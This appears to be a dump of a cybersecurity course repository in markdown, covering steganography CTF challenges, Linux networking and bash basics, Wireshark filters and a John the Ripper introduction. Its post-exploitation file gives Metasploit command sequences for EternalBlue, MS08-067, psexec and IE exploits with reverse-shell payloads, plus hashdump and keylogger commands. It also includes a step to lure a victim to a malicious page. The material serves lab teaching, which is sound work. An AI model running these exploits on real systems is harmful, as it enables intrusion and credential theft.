27 | - The file is a jpeg file encoded using a base64 encoder. Use the base64 decoder to extract the original picture. 28 | - Image converted to base64 using 29 | ```bash 30 | base64 secret_image.jpeg > secret_image.txt 31 | ``` 32 | - Converting the image back to jpeg 33 | ```bash 34 | base64 -d secret_image.txt > recovered.jpg 35 | ``` 36 | - Extract the hidden content and save the response to the form https://docs.google.com/forms/d/e/1FAIpQLScPeTRSHloUYzJTJR_aJ6Nj69Y24u7UAcUgkkvsvWDREOw4Nw/viewform?usp=sharing, and If the password is unknown, attempt common password lists or brute force methods using a ```stegseek``` tool. 37 | 38 | 39 | # Challenge 2: Hidden QR Code (Advanced Image Steganography) 40 | 41 | **Scenario:** 42 | An underground hacking group shares sensitive information using images. The real message is hidden inside a **QR code** embedded within another image. 43 | 44 | https://imagemagick.org/script/composite.php 45 | 46 | Download image from https://www.dropbox.com/scl/fi/6zcun8ujnmg2wgwxwi5o4/stego_image.png.tar.gz?rlkey=f2oeewzwrcct056e3cxs565yx&st=mg59w6z8&dl=0 47 | 48 | ## **1. Open the Image in Stegsolve** 49 | Use **Stegsolve**, a Java-based tool for steganography analysis. 50 | 51 | #### **Install Stegsolve (Java Required)** 52 | 1. Download Stegsolve from: 53 | **https://github.com/zardus/ctf-tools/blob/master/stegsolve/install** 54 | 2. Run it: 55 | ```bash 56 | java -jar stegsolve.jar 57 | ``` 58 | 59 | #### **Analyze the Image Using Color Planes** 60 | 1. **Open `stego_image.png`** in Stegsolve. 61 | 2. Click through the different **color planes** (Red, Green, Blue, Alpha). 62 | 3. **Look for patterns resembling a QR code**. 63 | 64 | ### **2. Extract & Scan the QR Code** 65 | Once you identify the QR code: 66 | 1. **Take a screenshot** of the QR code. 67 | 2. Use **zbarimg** (Linux) or a QR scanner app to decode it. 68 | 69 | #### **Extract with zbarimg (Linux)** 70 | ```bash 71 | zbarimg extracted_qr.png 72 | ``` 73 | This will reveal the **hidden URL or message**. 74 | 75 | 76 | 77 | -------------------------------------------------------------------------------- /week2/day1_networking.md: -------------------------------------------------------------------------------- 1 | ### **Networking in Linux** 2 | 3 | Networking is an essential aspect of Linux, enabling systems to communicate, share resources, and interact seamlessly across various platforms, including Linux, Windows, and macOS. The flexibility and robustness of Linux networking make it a powerful tool for both small-scale and large-scale network configurations. 4 | 5 | --- 6 | 7 | ### **Key Features of Linux Networking** 8 | 1. **Versatility**: Supports a wide range of network protocols. 9 | 2. **Performance**: Known for its efficiency and capability to handle large-scale configurations. 10 | 3. **File-Based Configuration**: Stores network settings in configuration files, making them easy to edit and automate. 11 | - Examples: 12 | - **Debian/Ubuntu**: `/etc/network/interfaces` 13 | - **RHEL/CentOS**: `/etc/sysconfig/network-scripts/` 14 | 15 | --- 16 | 17 | ### **Popular Networking Commands** 18 | 19 | 1. **`ifconfig` (Interface Configuration)** 20 | - Displays or configures network interfaces. 21 | - **Usage**: 22 | ```bash 23 | ifconfig 24 | ``` 25 | - Outputs details about active network interfaces (e.g., IP address, subnet mask, and MAC address). 26 | - **Note**: `ifconfig` is becoming obsolete and is being replaced by the `ip` command. 27 | 28 | --- 29 | 30 | 2. **`ip` Command** (Replacement for `ifconfig`) 31 | - More feature-rich and versatile than `ifconfig`. 32 | - **Examples**: 33 | - Display all network interfaces: 34 | ```bash 35 | ip addr 36 | ``` 37 | - Bring an interface up or down: 38 | ```bash 39 | ip link set eth0 up 40 | ip link set eth0 down 41 | ``` 42 | - Display routing table: 43 | ```bash 44 | ip route show 45 | ``` 46 | 47 | --- 48 | 49 | 3. **`ping` Command** 50 | - Tests the connectivity between two systems. 51 | - **Example**: 52 | ```bash 53 | ping google.com 54 | ``` 55 | 56 | --- 57 | 58 | 4. **`netstat` / `ss` Commands** 59 | - Displays network statistics and open connections. 60 | - **Examples**: 61 | ```bash 62 | netstat -tuln 63 | ss -tuln 64 | ``` 65 | 66 | --- 67 | 68 | 5. **`traceroute`** 69 | - Traces the route packets take to reach a destination. 70 | - **Example**: 71 | ```bash 72 | traceroute google.com 73 | ``` 74 | 75 | --- 76 | 77 | 6. **`curl` and `wget`** 78 | - Tools for transferring data over a network. 79 | - **Examples**: 80 | - Using `curl`: 81 | ```bash 82 | curl -I https://example.com 83 | ``` 84 | - Using `wget`: 85 | ```bash 86 | wget https://example.com 87 | ``` 88 | 89 | --- 90 | 91 | ### **Networking Configuration Files** 92 | Linux stores network configurations in specific files depending on the distribution. 93 | - **Debian/Ubuntu**: `/etc/network/interfaces` 94 | - **RHEL/CentOS**: `/etc/sysconfig/network-scripts/` 95 | 96 | These files define the network interfaces and their settings, such as IP addresses, gateway, DNS, etc. 97 | 98 | --- 99 | 100 | ### **Final Note** 101 | Linux's networking tools and capabilities are extensive, allowing for flexible management of everything from simple home setups to complex enterprise networks. As the landscape evolves, transitioning from older commands like `ifconfig` to newer ones like `ip` ensures you stay ahead. 102 | -------------------------------------------------------------------------------- /shell_week/shell.md: -------------------------------------------------------------------------------- 1 | ## **1. Create and Run Your First Bash Shell Script** 2 | ### **Steps:** 3 | 1. Create a script file: 4 | ```bash 5 | nano myscript.sh 6 | ``` 7 | 2. Add the following content: 8 | ```bash 9 | #!/bin/bash 10 | echo "Hello, World!" 11 | ``` 12 | 3. Make it executable: 13 | ```bash 14 | chmod +x myscript.sh 15 | ``` 16 | 4. Run the script: 17 | ```bash 18 | ./myscript.sh 19 | ``` 20 | --- 21 | 22 | ## **2. Understanding Variables in Bash Shell Scripting** 23 | ### **Types of Variables:** 24 | - **User-defined variables** 25 | ```bash 26 | name="Kali" 27 | echo "Hello, $name" 28 | ``` 29 | - **Environment variables** 30 | ```bash 31 | echo "Current User: $USER" 32 | echo "Home Directory: $HOME" 33 | ``` 34 | - **Read-only variables** 35 | ```bash 36 | readonly myvar="This is constant" 37 | ``` 38 | --- 39 | 40 | ## **3. Passing Arguments to Bash Scripts** 41 | ### **Example:** 42 | ```bash 43 | #!/bin/bash 44 | echo "Script name: $0" 45 | echo "First argument: $1" 46 | echo "Second argument: $2" 47 | echo "All arguments: $@" 48 | echo "Total arguments: $#" 49 | ``` 50 | ### **Run the script:** 51 | ```bash 52 | ./myscript.sh Kali Linux 53 | ``` 54 | 55 | --- 56 | 57 | ## **4. Using Arrays in Bash** 58 | ### **Example:** 59 | ```bash 60 | #!/bin/bash 61 | fruits=("Apple" "Banana" "Cherry") 62 | 63 | # Print all elements 64 | echo "All Fruits: ${fruits[@]}" 65 | 66 | # Print specific element 67 | echo "First Fruit: ${fruits[0]}" 68 | 69 | # Add element 70 | fruits+=("Mango") 71 | 72 | # Length of array 73 | echo "Total Fruits: ${#fruits[@]}" 74 | ``` 75 | 76 | --- 77 | 78 | ## **5. Using Arithmetic Operators in Bash Scripting** 79 | ### **Example:** 80 | ```bash 81 | #!/bin/bash 82 | a=10 83 | b=5 84 | 85 | echo "Addition: $((a + b))" 86 | echo "Subtraction: $((a - b))" 87 | echo "Multiplication: $((a * b))" 88 | echo "Division: $((a / b))" 89 | echo "Modulus: $((a % b))" 90 | ``` 91 | 92 | --- 93 | 94 | ## **6. String Operations in Bash** 95 | ### **Example:** 96 | ```bash 97 | #!/bin/bash 98 | str="Hello Kali" 99 | 100 | # String Length 101 | echo "Length: ${#str}" 102 | 103 | # Substring 104 | echo "Substring: ${str:6:4}" 105 | 106 | # Replace substring 107 | echo "Replace: ${str/Kali/Linux}" 108 | ``` 109 | 110 | --- 111 | 112 | ## **7. Decision Making With If Else and Case Statements** 113 | ### **If-Else Example:** 114 | ```bash 115 | #!/bin/bash 116 | num=10 117 | 118 | if [ $num -gt 5 ]; then 119 | echo "Number is greater than 5" 120 | else 121 | echo "Number is 5 or less" 122 | fi 123 | ``` 124 | ### **Case Statement Example:** 125 | ```bash 126 | #!/bin/bash 127 | read -p "Enter a fruit name: " fruit 128 | 129 | case $fruit in 130 | "Apple") echo "You chose Apple." ;; 131 | "Banana") echo "You chose Banana." ;; 132 | "Cherry") echo "You chose Cherry." ;; 133 | *) echo "Unknown fruit!" ;; 134 | esac 135 | ``` 136 | 137 | --- 138 | 139 | ## **8. Loops in Bash** 140 | ### **For Loop:** 141 | ```bash 142 | #!/bin/bash 143 | for i in {1..5}; do 144 | echo "Iteration $i" 145 | done 146 | ``` 147 | ### **While Loop:** 148 | ```bash 149 | #!/bin/bash 150 | count=1 151 | 152 | while [ $count -le 5 ]; do 153 | echo "Count: $count" 154 | ((count++)) 155 | done 156 | ``` 157 | ### **Until Loop:** 158 | ```bash 159 | #!/bin/bash 160 | num=1 161 | 162 | until [ $num -ge 5 ]; do 163 | echo "Number: $num" 164 | ((num++)) 165 | done 166 | ``` 167 | -------------------------------------------------------------------------------- /projects/steghide-guide.md: -------------------------------------------------------------------------------- 1 | Here’s a **detailed step-by-step guide** on how to teach **Audio Steganography** using **DeepSound** and **Sonic Visualiser** in a practical, hands-on way. 2 | 3 | --- 4 | 5 | ## **Step 1: Understanding Audio Steganography** 6 | ### **1. Theory Explanation** 7 | Before jumping into the practical, explain **how data can be hidden inside an audio file**: 8 | - **Least Significant Bit (LSB) Encoding:** Modifies the least significant bits of audio samples to store secret data. 9 | - **Phase Coding:** Hides data by altering the phase of an audio signal. 10 | - **Spread Spectrum:** Spreads data across the audio file’s frequency spectrum. 11 | 12 | ### **2. Tools Overview** 13 | - **DeepSound** (Windows) → Used to **hide and extract** data from audio files. 14 | - **Sonic Visualiser** (Cross-platform) → Used to **analyze spectrograms** and detect hidden data. 15 | 16 | --- 17 | 18 | ## **Step 2: Practical Exercise – Hiding Data Using DeepSound** 19 | ### **1. Install DeepSound** 20 | - **Windows:** Download DeepSound from [here](https://jpinsoft.net/deepsound/downloads.php). 21 | - **Kali Linux:** Install Wine to run Windows apps: 22 | ```bash 23 | sudo apt install wine 24 | ``` 25 | Then, download DeepSound and run: 26 | ```bash 27 | wine DeepSound.exe 28 | ``` 29 | 30 | ### **2. Hide a Secret Message in an Audio File** 31 | 1. **Open DeepSound** and drag an MP3/WAV file into the main window. 32 | 2. Click **"Add Secret Files"** and select a text file (`secret.txt`). 33 | ```bash 34 | echo "The password is 1234" > secret.txt 35 | ``` 36 | 3. Click **"Encode"**, set a password (e.g., `mystegosecret`), and save the new steganographic audio file. 37 | 38 | --- 39 | 40 | ## **Step 3: Extracting Hidden Data with DeepSound** 41 | 1. Open DeepSound and **load the modified audio file**. 42 | 2. Enter the correct password to **extract the hidden text file**. 43 | 3. Open the extracted `secret.txt` file: 44 | ```bash 45 | cat secret.txt 46 | ``` 47 | 48 | **Student Task:** 49 | - Hide a message in an audio file and exchange files with a partner. 50 | - Extract the hidden message from a partner’s file. 51 | 52 | --- 53 | 54 | ## **Step 4: Detecting Hidden Messages Using Sonic Visualiser** 55 | ### **1. Install Sonic Visualiser** 56 | - **Linux (Kali/Ubuntu)** 57 | ```bash 58 | sudo apt install sonic-visualiser 59 | ``` 60 | - **Windows/Mac:** Download from [here](https://sonicvisualiser.org/). 61 | 62 | ### **2. Open the Steganographic Audio File** 63 | 1. Launch **Sonic Visualiser**. 64 | 2. Load the **modified audio file**. 65 | 3. Go to **Pane > Add Spectrogram** to analyze frequency changes. 66 | 67 | ### **3. Detecting Hidden Data** 68 | - **Compare a normal audio file vs. the stego-audio file.** 69 | - Look for **suspicious patterns** or **anomalies in the spectrogram**. 70 | 71 | **Student Task:** 72 | - Analyze different audio files and **try to detect which one contains hidden data**. 73 | - Explain findings based on frequency changes or anomalies. 74 | 75 | --- 76 | 77 | ## **Final Challenge** 78 | - **Red Team (Hiders):** Hide secret messages inside different audio files. 79 | - **Blue Team (Analysts):** Use **Sonic Visualiser** to detect steganographic files. 80 | - **Scoring:** 81 | - Successful extraction = **+2 points** 82 | - Successful detection = **+1 point** 83 | 84 | --- 85 | 86 | This will give students **both offensive (hiding data) and defensive (detection) skills** in steganography. Do you need a **custom CTF challenge** based on this lesson? 87 | -------------------------------------------------------------------------------- /week2/day4_ethernet_arp.md: -------------------------------------------------------------------------------- 1 | ### **Ethernet, ARP, and RARP in Linux Networking** 2 | 3 | Linux is a dominant operating system in the networking domain because of its reliability, open-source flexibility, and extensive protocol support. Among its essential networking concepts are **Ethernet**, **ARP (Address Resolution Protocol)**, and **RARP (Reverse Address Resolution Protocol)**. Here's a breakdown of these components and their significance: 4 | 5 | --- 6 | 7 | ### **1. Ethernet** 8 | - **Definition**: Ethernet is the most commonly used technology for establishing Local Area Networks (LANs). It allows multiple devices to communicate within the same physical or logical network. 9 | - **Role**: Ethernet is the foundation of LANs, enabling wired communication and providing a standard for data transmission. 10 | - **Key Features**: 11 | - High-speed communication. 12 | - Reliable, standardized protocols (e.g., IEEE 802.3). 13 | - Compatible with various physical media (cables like Cat5/Cat6). 14 | 15 | **Example in Linux**: 16 | To view Ethernet network interfaces: 17 | ```bash 18 | ip link show 19 | ``` 20 | 21 | --- 22 | 23 | ### **2. ARP (Address Resolution Protocol)** 24 | - **Definition**: ARP resolves IP addresses to MAC addresses. Since devices communicate over Ethernet using MAC addresses, ARP is critical for mapping an IP address (logical identifier) to its corresponding MAC address (hardware identifier). 25 | - **How It Works**: 26 | 1. A device sends an ARP request on the network, asking, “Who has this IP address?” 27 | 2. The device with the matching IP replies with its MAC address. 28 | 29 | **Example in Linux**: 30 | - To display the ARP table (current IP-to-MAC mappings): 31 | ```bash 32 | arp -n 33 | ``` 34 | - To manually add an ARP entry: 35 | ```bash 36 | sudo arp -s 192.168.1.10 00:1A:2B:3C:4D:5E 37 | ``` 38 | 39 | --- 40 | 41 | ### **3. RARP (Reverse Address Resolution Protocol)** 42 | - **Definition**: RARP performs the reverse of ARP. It maps MAC addresses to IP addresses, helping devices determine their IP when only their MAC is known. 43 | - **Usage**: 44 | - Often used during booting by diskless devices or workstations. 45 | - A RARP server assigns an IP address based on the device’s MAC address. 46 | 47 | **Note**: While RARP is historically significant, it has been mostly replaced by modern protocols like **DHCP (Dynamic Host Configuration Protocol)**. 48 | 49 | **Example**: 50 | RARP is not commonly used directly in modern Linux systems, but tools like `tcpdump` can capture and analyze RARP packets: 51 | ```bash 52 | sudo tcpdump -i eth0 ether proto 0x8035 53 | ``` 54 | 55 | --- 56 | 57 | ### **Significance in Linux Networking** 58 | - **Troubleshooting**: ARP tables help diagnose connectivity issues between devices. 59 | - **Network Management**: Understanding Ethernet frames and address mappings is crucial for configuring firewalls, monitoring traffic, and ensuring efficient communication. 60 | - **Legacy Systems**: While RARP is largely outdated, it provides insights into the evolution of networking protocols. 61 | 62 | --- 63 | 64 | ### **Comparison of ARP and RARP** 65 | | **Feature** | **ARP** | **RARP** | 66 | |------------------|------------------------------|------------------------------| 67 | | **Function** | Maps IP to MAC addresses. | Maps MAC to IP addresses. | 68 | | **Direction** | Forward resolution. | Reverse resolution. | 69 | | **Modern Use** | Widely used. | Largely replaced by DHCP. | 70 | 71 | -------------------------------------------------------------------------------- /week2/day3_subnetting.md: -------------------------------------------------------------------------------- 1 | ### **Understanding Subnetting in Linux** 2 | 3 | **Subnetting** is a fundamental technique in networking that divides a larger network into smaller, manageable subnetworks (subnets). It helps in: 4 | - **Improving Performance**: Reduces network congestion by isolating traffic. 5 | - **Enhancing Security**: Restricts access between subnets. 6 | - **Efficient IP Address Management**: Prevents wastage of IP addresses in large networks. 7 | 8 | Linux systems often play a central role in managing subnets within an Internet Protocol (IP) addressing scheme, making subnetting essential in complex network setups. 9 | 10 | --- 11 | 12 | ### **Benefits of Subnetting** 13 | 1. **Efficient Use of IP Addresses**: Allows multiple subnets within a single IP address range. 14 | 2. **Reduced Broadcast Domains**: Isolates traffic to specific subnets, reducing unnecessary traffic. 15 | 3. **Enhanced Security**: Limits communication between subnets, improving data privacy. 16 | 17 | --- 18 | 19 | ### **Subnetting in Practice** 20 | 21 | 1. **IP Address and Subnet Mask** 22 | - An IP address (e.g., `192.168.1.1`) identifies a device. 23 | - A subnet mask (e.g., `255.255.255.0`) defines the size of the network and subnet. 24 | 25 | Example: 26 | - **IP Address**: `192.168.1.1` 27 | - **Subnet Mask**: `255.255.255.0` 28 | - Total addresses in the subnet: 256 (from `192.168.1.0` to `192.168.1.255`). 29 | - Usable addresses: 254 (excluding `.0` and `.255` for network and broadcast). 30 | 31 | 2. **CIDR Notation** 32 | - Subnet masks are often written in CIDR (Classless Inter-Domain Routing) notation. 33 | - Example: `/24` = `255.255.255.0` (24 bits for the network, 8 bits for hosts). 34 | 35 | --- 36 | 37 | ### **Linux Commands for Subnetting** 38 | 39 | #### **1. Display the Current Routing Table** 40 | The `route` command shows routing rules and subnet information: 41 | ```bash 42 | route -n 43 | ``` 44 | - **Example Output**: 45 | ``` 46 | Kernel IP routing table 47 | Destination Gateway Genmask Flags Metric Ref Use Iface 48 | 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0 49 | 192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 50 | ``` 51 | 52 | #### **2. Add a New Subnet** 53 | Use the `route` command to add a route for a subnet: 54 | ```bash 55 | sudo route add -net 192.168.2.0/24 gw 192.168.1.1 56 | ``` 57 | - **Explanation**: 58 | - `192.168.2.0/24`: Subnet address and mask. 59 | - `192.168.1.1`: Gateway for the subnet. 60 | 61 | #### **3. Verify Network Interfaces and Subnet Configuration** 62 | ```bash 63 | ip addr 64 | ``` 65 | - Shows IP address and subnet mask for all interfaces. 66 | 67 | --- 68 | 69 | ### **Practical Example: Subnetting in Linux** 70 | Suppose you want to divide the network `192.168.1.0/24` into two subnets: 71 | - Subnet 1: `192.168.1.0/25` (128 addresses) 72 | - Subnet 2: `192.168.1.128/25` (128 addresses) 73 | 74 | 1. Configure Subnet 1: 75 | ```bash 76 | sudo route add -net 192.168.1.0/25 gw 192.168.1.1 77 | ``` 78 | 79 | 2. Configure Subnet 2: 80 | ```bash 81 | sudo route add -net 192.168.1.128/25 gw 192.168.1.1 82 | ``` 83 | 84 | 3. Verify: 85 | ```bash 86 | route -n 87 | ``` 88 | 89 | --- 90 | 91 | ### **Final Notes** 92 | - **Automation**: Use configuration files like `/etc/network/interfaces` (Debian/Ubuntu) or `/etc/sysconfig/network-scripts/` (RHEL/CentOS) for permanent routing rules. 93 | - **Replacement for `route`**: The `ip route` command is a modern alternative: 94 | ```bash 95 | ip route add 192.168.2.0/24 via 192.168.1.1 96 | ``` 97 | -------------------------------------------------------------------------------- /projects/new2_task.md: -------------------------------------------------------------------------------- 1 | ### **Explaining Wireshark Filters** 2 | In this step, you will learn how to use advanced display filters in Wireshark to perform more complex analysis tasks. 3 | Wireshark filters provide a powerful way to narrow down the traffic you want to inspect. Here’s a breakdown of the filters you've mentioned and their functionality: 4 | 5 | --- 6 | 7 | ### **1. Displaying HTTP GET Requests on TCP Port 80** 8 | 9 | **Filter:** 10 | ```bash 11 | tcp.port == 80 and http.request.method == GET 12 | ``` 13 | 14 | **Explanation:** 15 | - **`tcp.port == 80`**: This filter matches packets that are using TCP protocol and are directed to or from port 80. Port 80 is the default port for HTTP traffic. 16 | - **`http.request.method == GET`**: This filter looks for HTTP GET requests specifically. The HTTP GET method is used to request data from a specified resource, typically when you visit a website (like `www.example.com`). 17 | - **`and`**: This logical operator combines both conditions, meaning both must be true for the packet to match the filter. 18 | 19 | So, the combined filter shows all the **HTTP GET requests** that are using **TCP port 80**, typically indicating regular web browsing traffic where the client (browser) is requesting resources like HTML files, images, or scripts from a web server. 20 | 21 | --- 22 | 23 | ### **2. Displaying TCP Packets with a Length Between 1000 and 2000 Bytes** 24 | 25 | **Filter:** 26 | ```bash 27 | tcp.len >= 1000 and tcp.len <= 2000 28 | ``` 29 | 30 | **Explanation:** 31 | - **`tcp.len >= 1000`**: This part of the filter matches packets where the TCP payload (the data portion of the packet) is greater than or equal to 1000 bytes. 32 | - **`tcp.len <= 2000`**: This part of the filter matches packets where the TCP payload is less than or equal to 2000 bytes. 33 | - **`and`**: Again, the logical `and` operator means that both conditions must be true for the packet to match the filter. 34 | 35 | This filter is useful for inspecting **TCP packets with a specific size range**, such as large data transfers like file uploads, downloads, or other sizable communications, where the data portion of the packet falls between 1000 and 2000 bytes in length. 36 | 37 | --- 38 | 39 | ### **3. Displaying HTTP Traffic to/from Google** 40 | 41 | **Filter:** 42 | ```bash 43 | http.host contains "google.com" 44 | ``` 45 | 46 | **Explanation:** 47 | - **`http.host`**: This refers to the `Host` field in the HTTP request headers. The `Host` header specifies the domain name of the server (such as `google.com`) that the client wants to communicate with. 48 | - **`contains "google.com"`**: This part of the filter checks whether the `http.host` field contains the string `google.com`. This means it will capture any HTTP traffic where the request or response involves the Google domain (e.g., `www.google.com`, `mail.google.com`, etc.). 49 | 50 | This filter will show only the **HTTP traffic** involving **Google servers**. It's helpful when you want to isolate traffic to or from a particular website or service. 51 | 52 | --- 53 | 54 | ### **Combining Filters for Refined Analysis** 55 | 56 | By combining filters, you can tailor the data to your exact needs. For example, you can filter **only Google HTTP traffic** that also involves **GET requests** on **TCP port 80** by combining all three filters like this: 57 | 58 | ```bash 59 | tcp.port == 80 and http.request.method == GET and http.host contains "google.com" 60 | ``` 61 | 62 | This would show **HTTP GET requests** for **Google.com** specifically, on **port 80**, providing you with a very focused view of the traffic. 63 | 64 | --- 65 | 66 | ### **Conclusion** 67 | 68 | Wireshark's display filters are incredibly useful for narrowing down and focusing on specific network traffic. By combining protocol, port, size, and application-layer filters, you can efficiently analyze network behavior, troubleshoot problems, and detect anomalies or security issues. 69 | -------------------------------------------------------------------------------- /projects/post_exploitation_4.md: -------------------------------------------------------------------------------- 1 | 2 | 1. **How EternalBlue works** 3 | 2. **How to exploit it in a lab** 4 | 3. **How to approach the other ones step-by-step** 5 | 6 | 7 | 8 | ## **1️⃣ MS17-010 – EternalBlue SMBv1 RCE** 9 | 10 | **What it is:** 11 | 12 | * SMB (Server Message Block) is a file-sharing protocol in Windows. 13 | * In Windows 7 (and older systems), SMBv1 has a **buffer overflow vulnerability** that lets an attacker execute code remotely without authentication. 14 | * Microsoft patched it in March 2017 — but many unpatched systems still exist in labs. 15 | * Famously used in **WannaCry ransomware**. 16 | 17 | 18 | 19 | ### **Step-by-step Lab Example** 20 | 21 | **Requirements:** 22 | 23 | * Kali Linux attacker machine (Metasploit installed) 24 | * Windows 7 SP1 (32-bit or 64-bit) **unpatched** with SMBv1 enabled (Host-Only Network in VirtualBox/VMware) 25 | 26 | 27 | 28 | #### **1. Scan target with Nmap to check vulnerability** 29 | 30 | ```bash 31 | nmap -p 445 --script smb-vuln-ms17-010 32 | ``` 33 | 34 | * If it says **VULNERABLE**, you can proceed. 35 | 36 | 37 | 38 | #### **2. Start Metasploit** 39 | 40 | ```bash 41 | msfconsole 42 | ``` 43 | 44 | 45 | 46 | #### **3. Load the EternalBlue exploit** 47 | 48 | ```bash 49 | use exploit/windows/smb/ms17_010_eternalblue 50 | ``` 51 | 52 | 53 | #### **4. Set target IP** 54 | 55 | ```bash 56 | set RHOSTS 57 | ``` 58 | 59 | 60 | 61 | #### **5. Choose payload** 62 | 63 | ```bash 64 | set PAYLOAD windows/meterpreter/reverse_tcp 65 | set LHOST 66 | ``` 67 | 68 | 69 | 70 | #### **6. Exploit** 71 | 72 | ```bash 73 | exploit 74 | ``` 75 | 76 | * If successful, you’ll get a **Meterpreter session** (remote shell). 77 | 78 | 79 | 80 | #### **7. Post-exploitation fun** 81 | 82 | ```bash 83 | sysinfo # Get system info 84 | hashdump # Dump password hashes 85 | screenshot # Capture desktop screenshot 86 | keyscan_start # Start keylogger 87 | keyscan_dump # Dump logged keystrokes 88 | ``` 89 | 90 | 91 | ## **2️⃣ MS08-067 – NetAPI RCE** 92 | 93 | **How it works:** 94 | 95 | * Vulnerability in Windows Server service (`netapi32.dll`). 96 | * Allows **unauthenticated remote code execution** via malformed RPC requests. 97 | * Works well on older Windows 7 builds. 98 | 99 | **Lab Steps:** (Almost same as above) 100 | 101 | ```bash 102 | use exploit/windows/smb/ms08_067_netapi 103 | set RHOSTS 104 | set PAYLOAD windows/meterpreter/reverse_tcp 105 | set LHOST 106 | exploit 107 | ``` 108 | 109 | 110 | 111 | ## **3️⃣ psexec SMB Admin Access** 112 | 113 | **How it works:** 114 | 115 | * Not a vulnerability — but if weak credentials are found, you can log in remotely and run code. 116 | * Great for **lateral movement** exercises. 117 | 118 | ```bash 119 | use exploit/windows/smb/psexec 120 | set RHOSTS 121 | set SMBUser administrator 122 | set SMBPass 123456 123 | set PAYLOAD windows/meterpreter/reverse_tcp 124 | set LHOST 125 | exploit 126 | ``` 127 | 128 | --- 129 | 130 | ## **4️⃣ IE Browser Exploits** 131 | 132 | **How it works:** 133 | 134 | * Host a malicious webpage with Metasploit. 135 | * Victim visits in IE 8/9 → exploit triggers. 136 | 137 | Example: 138 | 139 | ```bash 140 | use exploit/windows/browser/ie_execcommand_uaf 141 | set SRVHOST 142 | set URIPATH / 143 | set PAYLOAD windows/meterpreter/reverse_tcp 144 | set LHOST 145 | exploit 146 | ``` 147 | 148 | Then, get victim to visit: 149 | `http:///` 150 | 151 | ## **5️⃣ Local Privilege Escalation** 152 | 153 | **How it works:** 154 | 155 | * You already have a low-privilege account, and you exploit a kernel or service misconfiguration to become SYSTEM. 156 | 157 | Example: 158 | 159 | ```bash 160 | use exploit/windows/local/ms10_015_kitrap0d 161 | set SESSION 162 | exploit 163 | ``` 164 | -------------------------------------------------------------------------------- /projects/challenge-3.md: -------------------------------------------------------------------------------- 1 | ### **Guide: Challenge 3 - Hidden QR Code (Advanced Image Steganography)** 2 | 3 | #### **Scenario:** 4 | An underground hacking group shares sensitive information using images. The real message is hidden inside a **QR code** embedded within another image. 5 | 6 | Students must analyze the image, extract the QR code, and scan it to reveal the hidden message. 7 | 8 | --- 9 | 10 | ## **Step 1: Setup for Instructors (Creating the Hidden QR Code Image)** 11 | 12 | ### **1. Install QR Code Generator (Linux)** 13 | If you are on **Kali Linux or Ubuntu**, install `qrencode`: 14 | ```bash 15 | sudo apt install qrencode 16 | ``` 17 | 18 | ### **2. Generate a QR Code with a Secret Message** 19 | Create a **QR code** that contains a **hidden message or URL**: 20 | ```bash 21 | qrencode -o hidden_qr.png "https://pastebin.com/hiddenmessage" 22 | ``` 23 | This will generate `hidden_qr.png`, which contains the secret message. 24 | 25 | ### **3. Embed the QR Code Inside Another Image** 26 | To hide the QR code inside another image: 27 | 28 | #### **Method 1: Using GIMP (GUI-based)** 29 | 1. Open GIMP and load a **cover image** (e.g., `background.jpg`). 30 | 2. Drag & drop `hidden_qr.png` onto the cover image as a **new layer**. 31 | 3. Reduce the QR layer’s **opacity** slightly (or blend it into shadows). 32 | 4. Use the **clone tool** or **smudge tool** to distort it slightly. 33 | 5. Save the final image as `stego_image.png`. 34 | 35 | #### **Method 2: Using ImageMagick (CLI-based)** 36 | If you prefer command-line tools: 37 | ```bash 38 | composite -blend 90 hidden_qr.png background.jpg stego_image.png 39 | ``` 40 | This **blends** the QR code into the background image, making it harder to detect. 41 | 42 | --- 43 | 44 | ## **Step 2: Student Tasks (Extracting & Analyzing the Hidden QR Code)** 45 | 46 | ### **1. Open the Image in Stegsolve** 47 | Students will use **Stegsolve**, a Java-based tool for steganography analysis. 48 | 49 | #### **Install Stegsolve (Java Required)** 50 | 1. Download Stegsolve from: 51 | **https://github.com/zardus/ctf-tools/blob/master/stegsolve/install** 52 | 2. Run it: 53 | ```bash 54 | java -jar Stegsolve.jar 55 | ``` 56 | 57 | #### **Analyze the Image Using Color Planes** 58 | 1. **Open `stego_image.png`** in Stegsolve. 59 | 2. Click through the different **color planes** (Red, Green, Blue, Alpha). 60 | 3. **Look for patterns resembling a QR code**. 61 | 62 | ### **2. Extract & Scan the QR Code** 63 | Once students identify the QR code: 64 | 1. **Take a screenshot** of the QR code. 65 | 2. Use **zbarimg** (Linux) or a QR scanner app to decode it. 66 | 67 | #### **Extract with zbarimg (Linux)** 68 | ```bash 69 | zbarimg extracted_qr.png 70 | ``` 71 | This will reveal the **hidden URL or message**. 72 | 73 | #### **Extract with Online Tools** 74 | If students extract the QR code manually, they can use: 75 | - **ZXing Decoder**: [https://zxing.org/w/decode.jspx](https://zxing.org/w/decode.jspx) 76 | 77 | --- 78 | 79 | ## **Step 3: Challenge Variations & Advanced Tasks** 80 | 81 | ### **Variation 1: Encrypt the QR Code Before Hiding** 82 | Instead of a plain URL, encrypt the QR content before generating the QR code: 83 | ```bash 84 | echo "SecretMessage" | gpg --encrypt --recipient "student@example.com" | qrencode -o encrypted_qr.png 85 | ``` 86 | Students must **decrypt the extracted QR code**. 87 | 88 | ### **Variation 2: Blend the QR Code Deeply** 89 | Use **LSB steganography** to deeply embed the QR code inside the image using `stegify`: 90 | ```bash 91 | stegify encode --carrier background.jpg --payload hidden_qr.png --result deep_stego.png 92 | ``` 93 | Students must use `stegify decode` to extract it. 94 | 95 | --- 96 | 97 | ## **Final Challenge: CTF Format** 98 | - **Red Team (Hackers):** Hide an encrypted QR code in an image. 99 | - **Blue Team (Forensic Analysts):** Extract, decode, and analyze it. 100 | 101 | Would you like **custom challenge hints or CTF flags** for students? 102 | -------------------------------------------------------------------------------- /projects/new_johntherepper.md: -------------------------------------------------------------------------------- 1 | John the Ripper (JtR) is a powerful open-source password cracking tool used by security professionals, ethical hackers, and penetration testers. This course will cover everything from basic usage to advanced techniques. 2 | 3 | --- 4 | 5 | # **Course: Cracking Password Hashes with John the Ripper** 6 | 7 | ## **Module 1: Introduction to John the Ripper** 8 | ### **1.1 What is John the Ripper?** 9 | - Overview of John the Ripper (JtR) 10 | - Use cases: Ethical hacking, pentesting, security audits 11 | - Supported operating systems (Linux, macOS, Windows) 12 | 13 | ### **1.2 Installation** 14 | - Installing on Linux: 15 | ```bash 16 | sudo apt update && sudo apt install john 17 | ``` 18 | or 19 | ```bash 20 | git clone https://github.com/openwall/john.git 21 | cd john/src && 